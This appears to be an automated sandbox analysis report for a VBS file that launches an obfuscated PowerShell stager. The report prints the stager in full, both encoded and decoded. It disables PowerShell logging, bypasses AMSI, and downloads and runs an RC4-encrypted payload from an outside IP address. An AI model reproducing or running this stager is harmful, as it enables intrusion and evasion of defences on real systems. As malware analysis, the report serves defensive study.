Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Aug. 12, 2024, 9:41 a.m.	Aug. 12, 2024, 9:43 a.m.

Size	5.1KB
Type	ASCII text, with very long lines
MD5	`5206af4c1898d8b2ec74bafd8b2b6077`
SHA256	`3ae37ec916074fc1fdbc8c1bcb9f1ba2b7ad1bd2d8bbe1e747223a8a06cbd9f7`
CRC32	`7D892425`
ssdeep	`96:z2L7j4Q85uCPDAZa6wgiplH6p/gR7KxJwO3O+JLs4FS/vez+zTi8Gx:zHXrM7ie/gRW7wO++J7FS/lzTi8I`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Accounts.vbs
3000
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAHIAUwBpAG8ATgBUAGEAQgBMAGUALgBQAFMAVgBFAHIAUwBpAG8ATgAuAE0AYQBqAG8AUgAgAC0ARwBlACAAMwApAHsAJABDADYANwA9AFsAcgBFAEYAXQAuAEEAcwBTAGUATQBiAEwAWQAuAEcAZQBUAFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAVABGAEkARQBgAEwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABjADYANwApAHsAJAA2AGMANAA9ACQAYwA2ADcALgBHAGUAVABWAEEATAB1AEUAKAAkAG4AVQBMAGwAKQA7AEkAZgAoACQANgBjADQAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAA2AEMANABbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA2AGMANABbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAQQBsAD0AWwBDAE8AbABsAEUAYwB0AEkAbwBOAHMALgBHAGUAbgBFAFIASQBjAC4ARABJAEMAVABpAG8AbgBBAHIAWQBbAHMAVABSAGkATgBnACwAUwB5AFMAdABFAG0ALgBPAGIAagBlAGMAVABdAF0AOgA6AE4ARQB3ACgAKQA7ACQAdgBhAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBhAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAA2AGMANABbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJAB2AGEATAB9AEUAbABTAGUAewBbAFMAQwBSAEkAcABUAEIAbABvAGMASwBdAC4AIgBHAEUAVABGAEkARQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAEwAdQBFACgAJABOAFUAbABMACwAKABOAGUAdwAtAE8AQgBqAEUAYwB0ACAAQwBvAEwATABFAEMAdABpAE8AbgBTAC4ARwBFAG4AZQBSAGkAQwAuAEgAYQBTAEgAUwBFAHQAWwBzAFQAcgBpAG4ARwBdACkAKQB9ACQAUgBFAGYAPQBbAFIARQBmAF0ALgBBAHMAUwBFAG0AQgBMAFkALgBHAEUAdABUAFkAUABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQBsAHMAJwApADsAJABSAEUARgAuAEcARQBUAEYASQBlAGwARAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAFQAVgBBAEwAVQBFACgAJABuAHUAbABMACwAJAB0AFIAVQBFACkAOwB9ADsAWwBTAHkAUwBUAEUATQAuAE4ARQBUAC4AUwBlAFIAdgBpAEMARQBQAE8AaQBuAFQATQBBAG4AYQBHAEUAcgBdADoAOgBFAFgAcABlAGMAVAAxADAAMABDAE8ATgB0AGkATgBVAGUAPQAwADsAJABCAGEAMAA9AE4ARQB3AC0ATwBiAGoAZQBDAHQAIABTAHkAcwB0AGUAbQAuAE4ARQB0AC4AVwBFAEIAQwBMAEkAZQBOAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKABbAFQARQB4AFQALgBFAE4AQwBvAEQASQBOAGcAXQA6ADoAVQBuAEkAQwBvAGQAZQAuAEcARQB0AFMAVAByAEkATgBHACgAWwBDAE8ATgB2AGUAcgB0AF0AOgA6AEYAcgBvAE0AQgBhAHMAZQA2ADQAUwBUAFIAaQBOAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AdwBBAHUAQQBEAEUAQQBNAFEAQQAzAEEAQwA0AEEATQBnAEEAdwBBAEQAZwBBAEwAZwBBAHgAQQBEAFEAQQBPAEEAQQA2AEEARABjAEEATwBBAEEAdwBBAEQAQQBBACcAKQApACkAOwAkAHQAPQAnAC8AbgBlAHcAcwAuAHAAaABwACcAOwAkAGIAQQAwAC4ASABlAEEARABlAFIAcwAuAEEARABEACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAQgBhADAALgBQAHIATwBYAHkAPQBbAFMAWQBTAFQARQBNAC4ATgBFAHQALgBXAEUAYgBSAEUAUQB1AGUAUwBUAF0AOgA6AEQAZQBmAGEAdQBMAHQAVwBlAEIAUAByAE8AeAB5ADsAJABiAGEAMAAuAFAAcgBvAFgAWQAuAEMAUgBlAGQARQBuAFQASQBBAGwAcwAgAD0AIABbAFMAeQBTAHQAZQBtAC4ATgBlAHQALgBDAHIAZQBEAGUAbgBUAEkAYQBsAEMAYQBDAGgARQBdADoAOgBEAGUAZgBhAFUATAB0AE4AZQBUAHcATwBSAEsAQwByAEUAZABFAG4AdABJAEEAbABTADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAGIAYQAwAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAUwBUAGUAbQAuAFQARQBYAHQALgBFAE4AQwBvAEQASQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAFQAQgBZAHQARQBzACgAJwBkADQALAAwAGcAawBAAFsAUAAqACEALwBmAHMAdABhADoAYgA3AFEAQgBoAGwAVQBEAHIANgB4AEUAXQAzAF8AJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAUgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAE8AdQBuAFQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AQgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJABiAGEAMAAuAEgAZQBhAEQARQByAHMALgBBAEQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAcQBHAFYAVABTAHkAPQBUAEoAWAB1AFgAVgBBAHUAZQBwADQAYgBuADcANABFAEwATwAzAFcAMgBUAEoAcABzAFIAZwA9ACIAKQA7ACQAZABhAHQAQQA9ACQAYgBhADAALgBEAE8AVwBOAGwAbwBBAGQARABBAFQAQQAoACQAUwBFAFIAKwAkAFQAKQA7ACQAaQBWAD0AJABEAEEAVABBAFsAMAAuAC4AMwBdADsAJABEAGEAVABBAD0AJABEAEEAVABBAFsANAAuAC4AJABEAEEAVABBAC4AbABlAG4AZwB0AEgAXQA7AC0ASgBvAEkATgBbAEMAaABBAFIAWwBdAF0AKAAmACAAJABSACAAJABkAEEAVABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=
  792

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch
193.117.208.148	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 12, 2024, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 12, 2024, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 12, 2024, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 12, 2024, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 12, 2024, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 12, 2024, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 12, 2024, 9:41 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 12, 2024, 9:41 a.m.			0	0

Command line console output was observed (50 out of 90 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: Exception calling "DownloadData" with "1" argument(s): "Unable to connect to th console_handle: 0x00000023	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: e remote server" console_handle: 0x0000002f	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: At line:1 char:1802 console_handle: 0x0000003b	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: + If($PSVErSioNTaBLe.PSVErSioN.MajoR -Ge 3){$C67=[rEF].AsSeMbLY.GeTTYPe('System console_handle: 0x00000047	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: .Management.Automation.Utils')."GETFIE`Ld"('cachedGroupPolicySettings','N'+'onP console_handle: 0x00000053	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: ublic,Static');If($c67){$6c4=$c67.GeTVALuE($nULl);If($6c4['ScriptB'+'lockLoggin console_handle: 0x0000005f	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: g']){$6C4['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$6c4['Scrip console_handle: 0x0000006b	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: tB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$VAl=[COllEctIoNs.Ge console_handle: 0x00000077	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: nERIc.DICTionArY[sTRiNg,SyStEm.ObjecT]]::NEw();$vaL.Add('EnableScriptB'+'lockLo console_handle: 0x00000083	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: gging',0);$VaL.Add('EnableScriptBlockInvocationLogging',0);$6c4['HKEY_LOCAL_MAC console_handle: 0x0000008f	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: HINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$va console_handle: 0x0000009b	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: L}ElSe{[SCRIpTBlocK]."GETFIE`lD"('signatures','N'+'onPublic,Static').SetVaLuE($ console_handle: 0x000000a7	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: NUlL,(New-OBjEct CoLLECtiOnS.GEneRiC.HaSHSEt[sTrinG]))}$REf=[REf].AsSEmBLY.GEtT console_handle: 0x000000b3	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: YPE('System.Management.Automation.Amsi'+'Utils');$REF.GETFIelD('amsiInitF'+'ail console_handle: 0x000000bf	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: ed','NonPublic,Static').SeTVALUE($nulL,$tRUE);};[SySTEM.NET.SeRviCEPOinTMAnaGEr console_handle: 0x000000cb	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: ]::EXpecT100CONtiNUe=0;$Ba0=NEw-ObjeCt System.NEt.WEBCLIeNT;$u='Mozilla/5.0 (Wi console_handle: 0x000000d7	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: ndows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$ser=$([TExT.ENCoDINg]:: console_handle: 0x000000e3	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: UnICode.GEtSTrING([CONvert]::FroMBase64STRiNg('aAB0AHQAcAA6AC8ALwAxADkAMwAuADEA console_handle: 0x000000ef	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: MQA3AC4AMgAwADgALgAxADQAOAA6ADcAOAAwADAA')));$t='/news.php';$bA0.HeADeRs.ADD('U console_handle: 0x000000fb	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: ser-Agent',$u);$Ba0.PrOXy=[SYSTEM.NEt.WEbREQueST]::DefauLtWeBPrOxy;$ba0.ProXY.C console_handle: 0x00000107	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: RedEnTIAls = [SyStem.Net.CreDenTIalCaChE]::DefaULtNeTwORKCrEdEntIAlS;$Script:Pr console_handle: 0x00000113	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: oxy = $ba0.Proxy;$K=[SySTem.TEXt.ENCoDIng]::ASCII.GeTBYtEs('d4,0gk@[P*!/fsta:b7 console_handle: 0x0000011f	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: QBhlUDr6xE]3_');$R={$D,$K=$ARgs;$S=0..255;0..255\|%{$J=($J+$S[$_]+$K[$_%$K.COunT console_handle: 0x0000012b	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: ])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D\|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I console_handle: 0x00000137	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: ],$S[$H]=$S[$H],$S[$I];$_-Bxor$S[($S[$I]+$S[$H])%256]}};$ba0.HeaDErs.ADd("Cooki console_handle: 0x00000143	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: e","qGVTSy=TJXuXVAuep4bn74ELO3W2TJpsRg=");$datA=$ba0.DOWNloAdDATA <<<< ($SER+$T console_handle: 0x0000014f	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: );$iV=$DATA[0..3];$DaTA=$DATA[4..$DATA.lengtH];-JoIN[ChAR[]](& $R $dATA ($IV+$K console_handle: 0x0000015b	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: ))\|IEX console_handle: 0x00000167	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x00000173	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x0000017f	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: Cannot index into a null array. console_handle: 0x0000019f	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: At line:1 char:1822 console_handle: 0x000001ab	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: + If($PSVErSioNTaBLe.PSVErSioN.MajoR -Ge 3){$C67=[rEF].AsSeMbLY.GeTTYPe('System console_handle: 0x000001b7	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: .Management.Automation.Utils')."GETFIE`Ld"('cachedGroupPolicySettings','N'+'onP console_handle: 0x000001c3	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: ublic,Static');If($c67){$6c4=$c67.GeTVALuE($nULl);If($6c4['ScriptB'+'lockLoggin console_handle: 0x000001cf	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: g']){$6C4['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$6c4['Scrip console_handle: 0x000001db	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: tB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$VAl=[COllEctIoNs.Ge console_handle: 0x000001e7	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: nERIc.DICTionArY[sTRiNg,SyStEm.ObjecT]]::NEw();$vaL.Add('EnableScriptB'+'lockLo console_handle: 0x000001f3	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: gging',0);$VaL.Add('EnableScriptBlockInvocationLogging',0);$6c4['HKEY_LOCAL_MAC console_handle: 0x000001ff	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: HINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$va console_handle: 0x0000020b	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: L}ElSe{[SCRIpTBlocK]."GETFIE`lD"('signatures','N'+'onPublic,Static').SetVaLuE($ console_handle: 0x00000217	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: NUlL,(New-OBjEct CoLLECtiOnS.GEneRiC.HaSHSEt[sTrinG]))}$REf=[REf].AsSEmBLY.GEtT console_handle: 0x00000223	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: YPE('System.Management.Automation.Amsi'+'Utils');$REF.GETFIelD('amsiInitF'+'ail console_handle: 0x0000022f	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: ed','NonPublic,Static').SeTVALUE($nulL,$tRUE);};[SySTEM.NET.SeRviCEPOinTMAnaGEr console_handle: 0x0000023b	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: ]::EXpecT100CONtiNUe=0;$Ba0=NEw-ObjeCt System.NEt.WEBCLIeNT;$u='Mozilla/5.0 (Wi console_handle: 0x00000247	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: ndows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$ser=$([TExT.ENCoDINg]:: console_handle: 0x00000253	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: UnICode.GEtSTrING([CONvert]::FroMBase64STRiNg('aAB0AHQAcAA6AC8ALwAxADkAMwAuADEA console_handle: 0x0000025f	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: MQA3AC4AMgAwADgALgAxADQAOAA6ADcAOAAwADAA')));$t='/news.php';$bA0.HeADeRs.ADD('U console_handle: 0x0000026b	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: ser-Agent',$u);$Ba0.PrOXy=[SYSTEM.NEt.WEbREQueST]::DefauLtWeBPrOxy;$ba0.ProXY.C console_handle: 0x00000277	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: RedEnTIAls = [SyStem.Net.CreDenTIalCaChE]::DefaULtNeTwORKCrEdEntIAlS;$Script:Pr console_handle: 0x00000283	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5680 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e53c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e53c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e53c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e4fc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e4fc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e4fc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e4fc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e4fc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e4fc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e4ac0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e4ac0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e4ac0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e55c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e55c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e55c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5180 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e55c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e55c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e55c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e55c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e55c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e55c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e55c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e4b80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e4b80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050ee458 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050ee458 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050ee458 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050ee458 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050ee458 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050ee458 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

